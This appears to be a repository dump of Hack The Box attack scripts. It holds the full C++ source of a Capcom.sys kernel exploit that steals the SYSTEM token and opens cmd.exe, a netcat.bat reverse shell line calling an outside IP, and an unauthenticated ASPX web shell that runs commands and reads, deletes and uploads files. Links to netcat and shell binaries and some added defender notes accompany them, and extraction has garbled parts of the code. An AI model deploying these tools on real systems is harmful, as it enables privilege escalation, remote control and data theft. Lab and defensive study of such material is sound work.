├── .gitmodules ├── LICENSE ├── PowerUp.ps1 ├── README.md ├── exploit-capcom ├── ExploitCapcom.cpp ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── exploit-fuse ├── Capcom.sys ├── EOPLOADDRIVER.exe ├── ExploitCapcom_modded.exe ├── netcat.bat └── shell.exe ├── exploit-worker └── reverseshell.aspx ├── nc.exe └── nc64.exe /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "pspy"] 2 | path = pspy 3 | url = https://github.com/DominicBreuker/pspy 4 | 5 | [submodule "lxd-alpine-builder"] 6 | path = exploit-tabby/lxd-alpine-builder 7 | url = https://github.com/saghul/lxd-alpine-builder 8 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Michael Michel 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Hackthebox scripts
Scripts,shell used for solving box

--------------------------------------------------------------------------------
/exploit-capcom/ExploitCapcom.cpp:
--------------------------------------------------------------------------------
// Copyright (c) 2016, Satoshi Tanda. All rights reserved.
// Use of this source code is governed by a MIT-style license that can be
// found in the LICENSE file.

//
// NOTE(review): this listing was flattened during extraction. Text that stood
// in angle brackets (template parameter lists, the target types of
// reinterpret_cast/static_cast, and the targets of several #include lines)
// appears to be missing, so the file does not compile as shown. Every code
// token below is left exactly as it appears on the page.
//
// What the visible code does:
//   1. Opens the device \\.\Htsysm72FB created by Capcom.sys.
//   2. Places a small trampoline in a user-mode RWX allocation and sends
//      IOCTL 0xaa013044 with a pointer into that allocation.
//   3. According to the comments in this file, the driver then executes the
//      code at that pointer, passing MmGetSystemRoutineAddress
//      (see KernelPayload's signature).
//   4. KernelPayload overwrites the Token field of the current process with
//      the token of the System process; user mode then starts cmd.exe.
//
// Defender notes: the device name and the IOCTL code are fixed values in this
// file and can serve as static indicators. The technique depends on Capcom.sys
// already being loaded, so driver-load telemetry and a vulnerable-driver block
// policy are the controls that stop it before this program does anything.
//


#include "stdafx.h"
#pragma comment(lib, "ntdll.lib")

////////////////////////////////////////////////////////////////////////////////
//
// macro utilities
//

////////////////////////////////////////////////////////////////////////////////
//
// constants and macros
//

////////////////////////////////////////////////////////////////////////////////
//
// types
//

// Opaque kernel process object; only ever handled as a pointer in this file.
typedef void *PEPROCESS;

// Function-pointer types for the kernel exports that KernelPayload resolves by
// name at run time through MmGetSystemRoutineAddress.
using PSGETCURRENTPROCESSID = HANDLE(NTAPI*)();

using PSLOOKUPPROCESSBYPROCESSID = NTSTATUS(NTAPI *)(_In_ HANDLE ProcessId,
                                                     _Out_ PEPROCESS * Process);

using OBDEREFERENCEOBJECT = VOID(NTAPI *)(_In_ PVOID Object);

using PSREFERENCEPRIMARYTOKEN = PACCESS_TOKEN(NTAPI *)(
    _Inout_ PEPROCESS Process);

using PSDEREFERENCEPRIMARYTOKEN = VOID(NTAPI *)(
    _In_ PACCESS_TOKEN PrimaryToken);

using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI *)(
    _In_ PUNICODE_STRING SystemRoutineName);

// Represents shellcode to be executed.
// Layout: 1 + 1 + 6 bytes of instructions, followed by the 8-byte jump target.
// NOTE(review): the two bare #include lines around this struct have lost their
// targets in extraction; presumably they set and restore structure packing --
// confirm against the upstream file.
#include
typedef struct _SHELLCODE
{
    BYTE Nop[1];
    BYTE Sti[1];
    BYTE Jmp[6];
    void *PayloadAddress;
} SHELLCODE, *PSHELLCODE;
#include

// Represents a layout of in-buffer for the vulnerable IOCTL.
// ShellcodeAddress occupies the bytes immediately before Shellcode, which is
// what the "+ 8" pointer adjustment in ExploitCapcomDriver relies on.
typedef struct _IOCTL_IN_BUFFER
{
    void *ShellcodeAddress;
    SHELLCODE Shellcode;
} IOCTL_IN_BUFFER, *PIOCTL_IN_BUFFER;

////////////////////////////////////////////////////////////////////////////////
//
// prototypes
//

static bool ExploitCapcomDriver();

static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress);

static void *GetSystemRoutineAddress(
    MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress,
    const wchar_t *RoutineName);

static PACCESS_TOKEN GetProceesTokenAddress(ULONG_PTR Address);

static bool LaunchShell();

////////////////////////////////////////////////////////////////////////////////
//
// variables
//

// Indicates whether token stealing is done successfully.
// Written by KernelPayload and read back by ExploitCapcomDriver after the
// IOCTL returns; it is the only channel between the two.
static BOOLEAN gIsTokenStealingSuccessful = FALSE;

////////////////////////////////////////////////////////////////////////////////
//
// implementations
//

// Entry point. The result of ExploitCapcomDriver() is discarded, so the
// process exit code is 0 whether or not any step succeeded.
int main()
{
    ExploitCapcomDriver();
    return 0;
}

// Makes std::unique_ptr with a custom deleter.
// Used below so that the device handle is closed on every return path.
// NOTE(review): the template parameter list and the unique_ptr/forward type
// arguments are missing from this listing (lost in extraction).
template static
std::unique_ptr make_unique_ex(Resource *p,
    Deleter d = Deleter())
{
    return std::unique_ptr(p, std::forward(d));
}

// Exploits the vulnerable feature in capcom.sys and launches the SYSTEM cmd.exe.
//
// Returns true only when every step succeeded: device opened, buffer
// allocated, IOCTL accepted, token replaced, and cmd.exe started. Each failure
// prints a "[-]" line and returns false.
static bool ExploitCapcomDriver()
{
    std::cout << std::hex;
    std::cout << "[*] Capcom.sys exploit" << std::endl;

    // Open the device created by Capcom.sys.
    // The call fails unless the driver is already loaded; this program does
    // not load it. The device name is a fixed string and therefore a usable
    // static indicator.
    auto DeviceHandle = make_unique_ex(
        CreateFile(TEXT("\\\\.\\Htsysm72FB"), GENERIC_READ | GENERIC_WRITE,
                   FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, OPEN_EXISTING,
                   FILE_ATTRIBUTE_NORMAL, nullptr),
        ::CloseHandle);
    if (DeviceHandle.get() == INVALID_HANDLE_VALUE)
    {
        std::cout << "[-] CreateFile failed" << std::endl;
        return false;
    }
    std::cout << "[*] Capcom.sys handle was obtained as " << DeviceHandle.get()
              << std::endl;

    //
    // Allocate an executable memory containing shellcode. The data structure
    // should have an address of code to be executed. In this exploit,
    // trampoline code that leads to KernelPayload is also given as the
    // function to execute.
    //
    // The allocation is user-mode memory with PAGE_EXECUTE_READWRITE
    // protection; the first field is made to point at the trampoline that
    // follows it in the same allocation.
    //
    auto InBufferContents = reinterpret_cast(VirtualAlloc(
        nullptr, sizeof(IOCTL_IN_BUFFER), MEM_COMMIT, PAGE_EXECUTE_READWRITE));
    if (!InBufferContents)
    {
        std::cout << "[-] VirtualAlloc failed" << std::endl;
        return false;
    }
    InBufferContents->ShellcodeAddress = &InBufferContents->Shellcode;

    //
    // This code is executed first by the feature on PASSIVE_LEVEL, interruption
    // disabled state. This shellcode first enables interruptions so that
    // Windows can page-in the KernelPayload even if it is paged-out, and
    // KernelPayload can call kernel API. Then this code transfers execution to
    // KernelPayload.
    //
    // The jmp uses a zero displacement, so its target is read from the eight
    // bytes that directly follow the instruction, i.e. PayloadAddress.
    //
    InBufferContents->Shellcode = {
        { 0x90, },                                // nop     ; for debugging
        { 0xfb, },                                // sti
        { 0xff, 0x25, 0x00, 0x00, 0x00, 0x00, },  // jmp qword ptr [nextline]
                                                  // nextline:
        &KernelPayload,                           // dq KernelPayload
    };
    std::cout << "[*] Shellcode was placed at " << &InBufferContents->Shellcode
              << std::endl;

    // +8 because, capcom.sys uses an address of IOCTL buffer - 8.
    // The value sent is the address of Shellcode, so "address - 8" lands on
    // the ShellcodeAddress field of the same structure. The static_asserts pin
    // the buffer sizes to 8 and 4 bytes, which also fixes this to a 64-bit
    // build.
    auto InBuffer = reinterpret_cast(InBufferContents) + 8;
    static_assert(sizeof(InBuffer) == 8, "an in buffer size must be 8");

    uint32_t OutBuffer = 0;
    static_assert(sizeof(OutBuffer) == 4, "an out buffer size must be 4");

    // Issue IOCTL for the vulnerable feature.
    // The control code is a fixed constant and a second static indicator next
    // to the device name. The input is the pointer value itself (8 bytes), not
    // the structure it points to.
    static const DWORD VulnerableIoctlCode = 0xaa013044;
    DWORD BytesReturned = 0;
    auto Ok = DeviceIoControl(DeviceHandle.get(), VulnerableIoctlCode, &InBuffer,
                              sizeof(InBuffer), &OutBuffer, sizeof(OutBuffer),
                              &BytesReturned, nullptr);
    VirtualFree(InBufferContents, 0, MEM_RELEASE);  // no longer necessary
    if (!Ok)
    {
        std::cout << "[-] DeviceIoControl failed" << std::endl;
        return false;
    }
    std::cout << "[+] Shellcode was executed" << std::endl;

    // Is this process now running with SYSTEM privileges?
    // The flag is set by KernelPayload only when it found and replaced the
    // token field.
    if (!gIsTokenStealingSuccessful)
    {
        std::cout << "[-] Token stealing failed" << std::endl;
        return false;
    }
    std::cout << "[+] Token stealing was successful" << std::endl;

    // Launch command prompt
    if (!LaunchShell())
    {
        std::cout << "[-] CreateProcess() failed" << std::endl;
        return false;
    }
    std::cout << "[+] The SYSTEM shell was launched" << std::endl;
    std::cout << "[*] Press any key to exit this program" << std::endl;
    getchar();
    return true;
}

//
// Performs token stealing and elevates the current process to SYSTEM.
//
// Called through the trampoline with the address of MmGetSystemRoutineAddress
// as its only argument. Resolves the kernel routines it needs by name, looks
// up the current process object, and replaces that object's token reference
// with the one held by PsInitialSystemProcess.
//
// NOTE(review): none of the resolved pointers is checked before use. This
// function is user-mode code running in kernel context, so a failed lookup
// would fault in kernel mode rather than return an error.
//
static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
{
    auto PsLookupProcessByProcessId =
        reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"PsLookupProcessByProcessId"));

    auto ObDereferenceObject =
        reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"ObDereferenceObject"));

    auto PsReferencePrimaryToken =
        reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"PsReferencePrimaryToken"));

    auto PsDereferencePrimaryToken =
        reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"PsDereferencePrimaryToken"));

    auto PsGetCurrentProcessId =
        reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"PsGetCurrentProcessId"));

    // Get the process object of the kernel.
    // PsInitialSystemProcess is an exported variable, hence the extra
    // dereference of the resolved address.
    auto SystemProcess =
        *reinterpret_cast(GetSystemRoutineAddress(
            MmGetSystemRoutineAddress, L"PsInitialSystemProcess"));

    // Get the process object of the current process
    PEPROCESS CurrentProcess = nullptr;
    NTSTATUS Status = PsLookupProcessByProcessId(PsGetCurrentProcessId(),
                                                 &CurrentProcess);
    if (!NT_SUCCESS(Status))
    {
        return;
    }

    auto CurrentToken = PsReferencePrimaryToken(CurrentProcess);
    auto SystemToken = PsReferencePrimaryToken(SystemProcess);

    // Search for the token field in EPROCESS, scanning up to 0x80
    // pointer-sized slots. The field is located by value (it matches the token
    // returned above) rather than by a fixed offset, so no per-build offset
    // is hard-coded.
    for (auto Offset = 0ul; Offset < sizeof(void *) * 0x80;
         Offset += sizeof(void *))
    {
        // Does this address store the token?
        const auto TestAddress =
            reinterpret_cast(CurrentProcess) + Offset;
        const auto ProbableToken = GetProceesTokenAddress(TestAddress);
        if (ProbableToken == CurrentToken)
        {
            // Found the field, replace the contents with the SYSTEM token
            auto TokenAddress = reinterpret_cast(TestAddress);
            *TokenAddress = SystemToken;
            gIsTokenStealingSuccessful = TRUE;
            break;
        }
    }

    // Release the references taken above.
    PsDereferencePrimaryToken(CurrentToken);
    PsDereferencePrimaryToken(SystemToken);
    ObDereferenceObject(CurrentProcess);
}

// Returns an address of exports in NT or HAL.
// Thin wrapper that converts the wide-string name to a UNICODE_STRING and
// forwards it to the supplied MmGetSystemRoutineAddress pointer; the result is
// returned unchecked.
static void *GetSystemRoutineAddress(
    MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress,
    const wchar_t *RoutineName)
{
    UNICODE_STRING RoutineNameU = {};
    RtlInitUnicodeString(&RoutineNameU, RoutineName);
    return MmGetSystemRoutineAddress(&RoutineNameU);
}

// Returns an address of a token assuming that Address points to the Token field.
// Reads one pointer-sized value at Address and clears its low four bits.
static PACCESS_TOKEN GetProceesTokenAddress(ULONG_PTR Address)
{
    //
    // To get an address of a token from the Token field in EPROCESS, the lowest
    // N bits where N is size of a RefCnt field needs to be masked.
    //
    //  kd> dt nt!_EX_FAST_REF
    //     + 0x000 Object           : Ptr64 Void
    //     + 0x000 RefCnt           : Pos 0, 4 Bits
    //     + 0x000 Value            : Uint8B
    //
    const auto Value = *reinterpret_cast(Address);
    return reinterpret_cast(Value &
        (static_cast(~0xf)));
}

// Launches a command shell process.
// Starts C:\Windows\system32\cmd.exe in a new console with default security
// attributes and no handle inheritance, then closes the returned handles.
// Returns false when CreateProcess fails.
//
// Defender note: the observable result is a cmd.exe whose parent was started
// by an ordinary user while the child runs under the token installed by
// KernelPayload; a parent/child mismatch of that kind is what process-creation
// telemetry can alert on.
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
                       CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
                       &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

--------------------------------------------------------------------------------
/exploit-capcom/stdafx.cpp:
--------------------------------------------------------------------------------
// stdafx.cpp : source file that includes just the standard includes
// ExploitCapcom.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

--------------------------------------------------------------------------------
/exploit-capcom/stdafx.h:
--------------------------------------------------------------------------------
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//

#pragma once

#include "targetver.h"

// NOTE(review): the six #include lines below have lost their <...> targets in
// extraction; the headers they named cannot be determined from this listing.
#include
#include
#include

#include
#include
#include


// TODO: reference additional headers your program requires here

-------------------------------------------------------------------------------- /exploit-capcom/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /exploit-fuse/Capcom.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/Capcom.sys -------------------------------------------------------------------------------- /exploit-fuse/EOPLOADDRIVER.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/EOPLOADDRIVER.exe -------------------------------------------------------------------------------- /exploit-fuse/ExploitCapcom_modded.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/ExploitCapcom_modded.exe -------------------------------------------------------------------------------- /exploit-fuse/netcat.bat: -------------------------------------------------------------------------------- 1 | c:\temp\nc.exe 10.10.14.195 2222 -e cmd.exe 2 | -------------------------------------------------------------------------------- /exploit-fuse/shell.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/shell.exe
--------------------------------------------------------------------------------
/exploit-worker/reverseshell.aspx:
--------------------------------------------------------------------------------
<%-- ASPX Shell by LT (2007) --%>
<%--
  NOTE(review): HTML markup appears to have been stripped from this listing
  during extraction. Several string.Format calls below pass two arguments to a
  format string that shows only one placeholder, and the markup declaring the
  controls used here (lblPath, lblDrives, lblDirOut, lblCmdOut, flUp, txtCmdIn)
  is not visible. Code tokens are left exactly as they appear.

  What the visible code does on each request, with no authentication or
  authorization check anywhere in the listing:
    - takes the working directory from the "fdir" query parameter,
    - returns the file named by "get",
    - deletes the file named by "del",
    - saves an uploaded file into the working directory,
    - runs the submitted text through "cmd.exe /c" and shows its output.

  Defender notes: the observable behaviours are a web application process
  starting cmd.exe (typically the IIS worker process; confirm for the host in
  question) and requests to an .aspx page carrying "fdir", "get" or "del"
  query parameters that hold filesystem paths. An unexpected .aspx file
  appearing under a web root is the earliest signal.
--%>
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
    string outstr = "";

    // get pwd
    // Defaults to the page's own directory; "fdir" from the query string
    // overrides it without any validation. Backslashes are normalised to
    // forward slashes and one pass of "//" collapsing is applied.
    string dir = Page.MapPath(".") + "/";
    if (Request.QueryString["fdir"] != null)
        dir = Request.QueryString["fdir"] + "/";
    dir = dir.Replace("\\", "/");
    dir = dir.Replace("//", "/");

    // build nav for path literal
    // One entry per path component; each entry is built from the cumulative
    // path (URL-encoded) and the component name (HTML-encoded).
    string[] dirparts = dir.Split('/');
    string linkwalk = "";
    foreach (string curpart in dirparts)
    {
        if (curpart.Length == 0)
            continue;
        linkwalk += curpart + "/";
        outstr += string.Format("{1}/ ",
                                    HttpUtility.UrlEncode(linkwalk),
                                    HttpUtility.HtmlEncode(curpart));
    }
    lblPath.Text = outstr;

    // create drive list
    // Enumerates every ready drive on the host and lists its root.
    outstr = "";
    foreach(DriveInfo curdrive in DriveInfo.GetDrives())
    {
        if (!curdrive.IsReady)
            continue;
        string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
        outstr += string.Format("{1} ",
                                    HttpUtility.UrlEncode(driveRoot),
                                    HttpUtility.HtmlEncode(driveRoot));
    }
    lblDrives.Text = outstr;

    // send file ?
    // The "get" value is passed to Response.WriteFile as-is, so any path the
    // application identity can read is returned; the response ends here.
    if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
    {
        Response.ClearContent();
        Response.WriteFile(Request.QueryString["get"]);
        Response.End();
    }

    // delete file ?
    // The "del" value is passed to File.Delete as-is, and the deletion is
    // triggered by a query-string parameter.
    if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
        File.Delete(Request.QueryString["del"]);

    // receive files ?
    // The uploaded file is written into the current working directory under
    // the client-supplied name, cut at the last path separator.
    if(flUp.HasFile)
    {
        string fileName = flUp.FileName;
        int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
        if (splitAt >= 0)
            fileName = flUp.FileName.Substring(splitAt);
        flUp.SaveAs(dir + "/" + fileName);
    }

    // enum directory and generate listing in the right pane
    // Subdirectories first, then files with their size in KB and a delete
    // entry built from the "dir" and file path values.
    DirectoryInfo di = new DirectoryInfo(dir);
    outstr = "";
    foreach (DirectoryInfo curdir in di.GetDirectories())
    {
        string fstr = string.Format("{1}",
                                    HttpUtility.UrlEncode(dir + "/" + curdir.Name),
                                    HttpUtility.HtmlEncode(curdir.Name));
        outstr += string.Format("{0}<DIR>", fstr);
    }
    foreach (FileInfo curfile in di.GetFiles())
    {
        string fstr = string.Format("{1}",
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name),
                                    HttpUtility.HtmlEncode(curfile.Name));
        string astr = string.Format("Del",
                                    HttpUtility.UrlEncode(dir),
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name));
        outstr += string.Format("{0}{1:d}{2}", fstr, curfile.Length / 1024, astr);
    }
    lblDirOut.Text = outstr;

    // exec cmd ?
    // The submitted text is appended to "/c " and handed to cmd.exe with no
    // window, the working directory set to dir, and stdout/stderr captured.
    // The child process is created by the web application's own process,
    // which is the parent/child pair process-creation monitoring should flag.
    if (txtCmdIn.Text.Length > 0)
    {
        Process p = new Process();
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.WorkingDirectory = dir;
        p.Start();

        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
        txtCmdIn.Text = "";
    }
%>

ASPX Shell


ASPX Shell by LT

124 |
125 | 126 | 127 | 133 | 156 | 157 |
128 |

Shell

129 | 130 | 131 |
132 |
134 |

File Browser

135 |

136 | Drives:
137 | 138 |

139 |

140 | Working directory:
141 | 142 |

143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 |
NameSize KBActions
151 |

Upload to this directory:
152 | 153 | 154 |

155 |
158 | 159 |
160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/nc.exe -------------------------------------------------------------------------------- /nc64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/nc64.exe --------------------------------------------------------------------------------